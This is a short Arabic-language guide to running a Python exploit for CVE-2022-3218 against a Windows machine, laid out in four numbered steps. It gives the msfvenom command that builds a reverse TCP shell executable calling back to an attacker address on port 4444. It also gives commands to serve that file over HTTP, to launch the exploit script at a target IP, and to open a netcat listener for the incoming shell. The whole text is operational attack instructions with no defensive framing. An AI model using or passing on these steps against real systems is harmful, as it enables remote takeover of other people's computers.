
استغلال بلغة بايثون لـ CVE-2022-3218 يُنتج حمولة TCP عكسية عبر msfvenom ويُسلمها عبر HTTP إلى جهاز ويندوز مستهدف.
الخطوة 1 — إنشاء حمولة حقيقية (ويندوز)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.5.50 LPORT=4444 -f exe -o exploit.exe
الخطوة 2 — تقديم الحمولة عبر HTTP في نفس الدليل: python3 -m http.server 80
الخطوة 3 — ضبط الاستغلال
شغّل كالتالي:
python3 CVE-2022-3218.py 172.20.7.185 10.8.5.50 exploit.exe
الخطوة 4 — مستمع قبل الاستغلال nc -lvnp 4444